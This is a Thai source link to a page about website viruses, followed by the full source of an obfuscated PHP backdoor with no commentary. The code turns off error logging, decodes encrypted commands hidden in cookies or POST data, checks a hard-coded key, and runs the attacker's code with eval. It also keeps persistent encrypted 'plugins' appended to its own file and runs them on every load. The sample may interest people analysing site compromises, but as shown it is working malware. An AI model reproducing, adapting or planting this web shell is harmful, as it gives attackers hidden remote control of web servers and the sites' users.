อ้างอิงจาก
https://vir9.com/wordpress/virus-website/
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('file_put_contents '))
{
define('file_put_contents ', 1);
$qnuaoyvn = '261db5d9-15cf-419f-880d-0fdf0819d070';
global $qnuaoyvn;
function tuqtfvqr($kcbhldz) {
if (strlen($kcbhldz) < 4)
{
return "";
}
$ztvsvka = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$sosvze = str_split($ztvsvka);
$sosvze = array_flip($sosvze);
$rzogcw = 0;
$rzogcwgxsyeow = "";
$kcbhldz = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $kcbhldz);
do {
$ynbevo = $sosvze[$kcbhldz[$rzogcw++]];
$amanzue = $sosvze[$kcbhldz[$rzogcw++]];
$ropnsmhp = $sosvze[$kcbhldz[$rzogcw++]];
$pqrsdn = $sosvze[$kcbhldz[$rzogcw++]];
$ermkaaaa = ($ynbevo << 2) | ($amanzue >> 4);
$jszahwezqhiblf = (($amanzue & 15) << 4) | ($ropnsmhp >> 2);
$geobitf = (($ropnsmhp & 3) << 6) | $pqrsdn;
$rzogcwgxsyeow = $rzogcwgxsyeow . chr($ermkaaaa);
if ($ropnsmhp != 64) {
$rzogcwgxsyeow = $rzogcwgxsyeow . chr($jszahwezqhiblf);
}
if ($pqrsdn != 64) {
$rzogcwgxsyeow = $rzogcwgxsyeow . chr($geobitf);
}
} while ($rzogcw < strlen($kcbhldz));
return $rzogcwgxsyeow;
}
if (!function_exists('file_put_contents'))
{
function file_put_contents($jszahwe, $xjsebzdz, $wacexvt = False)
{
$ssfwlxwa = $wacexvt == 8 ? 'a' : 'w';
$rzogcwudzfh = @fopen($jszahwe, $ssfwlxwa);
if ($rzogcwudzfh === False)
{
return 0;
}
else
{
if (is_array($xjsebzdz)) $xjsebzdz = implode($xjsebzdz);
$bsrqdxow = fwrite($rzogcwudzfh, $xjsebzdz);
fclose($rzogcwudzfh);
return $bsrqdxow;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($ocfwkt)
{
$wxfiuss = fopen($ocfwkt, "r");
$swwwagfe = fread($wxfiuss, filesize($ocfwkt));
fclose($wxfiuss);
return $swwwagfe;
}
}
function tasozejp()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function nlzyif($tbxtueug, $loyvbwrk)
{
$qlrmkr = "";
for ($rzogcw=0; $rzogcw<strlen($tbxtueug);)
{
for ($mxuzegbk=0; $mxuzegbk<strlen($loyvbwrk) && $rzogcw<strlen($tbxtueug); $mxuzegbk++, $rzogcw++)
{
$qlrmkr .= chr(ord($tbxtueug[$rzogcw]) ^ ord($loyvbwrk[$mxuzegbk]));
}
}
return $qlrmkr;
}
function dfwhfjkc($tbxtueug, $loyvbwrk)
{
global $qnuaoyvn;
return nlzyif(nlzyif($tbxtueug, $loyvbwrk), $qnuaoyvn);
}
function cgorxyfp($tbxtueug, $loyvbwrk)
{
global $qnuaoyvn;
return nlzyif(nlzyif($tbxtueug, $qnuaoyvn), $loyvbwrk);
}
function audhywhz()
{
$xeplxn = @file_get_contents(tasozejp());
$eixlxrsx = strpos($xeplxn, md5(tasozejp()));
if ($eixlxrsx !== FALSE)
{
$pzqwccb = substr($xeplxn, $eixlxrsx + 32);
$tnsemfk = @unserialize(dfwhfjkc(rawurldecode($pzqwccb), md5(tasozejp())));
}
else
{
$tnsemfk = Array();
}
return $tnsemfk;
}
function fapaahh($tnsemfk)
{
$xdrkkjed = rawurlencode(cgorxyfp(@serialize($tnsemfk), md5(tasozejp())));
$xeplxn = @file_get_contents(tasozejp());
$eixlxrsx = strpos($xeplxn, md5(tasozejp()));
if ($eixlxrsx !== FALSE)
{
$qcjogz = substr($xeplxn, $eixlxrsx + 32);
$xeplxn = str_replace($qcjogz, $xdrkkjed, $xeplxn);
}
else
{
$xeplxn = $xeplxn . "\n\n//" . md5(tasozejp()) . $xdrkkjed;
}
@file_put_contents(tasozejp(), $xeplxn);
}
function craljbl($uztyzdo, $tnzqpxs)
{
$tnsemfk = audhywhz();
$tnsemfk[$uztyzdo] = tuqtfvqr($tnzqpxs);
fapaahh($tnsemfk);
}
function tmawmar($uztyzdo)
{
$tnsemfk = audhywhz();
unset($tnsemfk[$uztyzdo]);
fapaahh($tnsemfk);
}
function yhrbysvf($uztyzdo=NULL)
{
foreach (audhywhz() as $apaivyl=>$utlbunkz)
{
if ($uztyzdo)
{
if (strcmp($uztyzdo, $apaivyl) == 0)
{
eval($utlbunkz);
break;
}
}
else
{
eval($utlbunkz);
}
}
}
foreach (array_merge($_COOKIE, $_POST) as $rzogcwudzfhvjnvjeb => $tbxtueug)
{
$tbxtueug = @unserialize(dfwhfjkc(tuqtfvqr($tbxtueug), $rzogcwudzfhvjnvjeb));
if (isset($tbxtueug['ak']) && $qnuaoyvn==$tbxtueug['ak'])
{
if ($tbxtueug['a'] == 'i')
{
$rzogcw = Array(
'pv' => @phpversion(),
'sv' => '2.0-1',
'ak' => $tbxtueug['ak'],
);
echo @serialize($rzogcw);
exit;
}
elseif ($tbxtueug['a'] == 'e')
{
eval($tbxtueug['d']);
}
elseif ($tbxtueug['a'] == 'plugin')
{
if($tbxtueug['sa'] == 'add')
{
craljbl($tbxtueug['p'], $tbxtueug['d']);
}
elseif($tbxtueug['sa'] == 'rem')
{
tmawmar($tbxtueug['p']);
}
}
echo $tbxtueug['ak'];
exit();
}
}
yhrbysvf();
}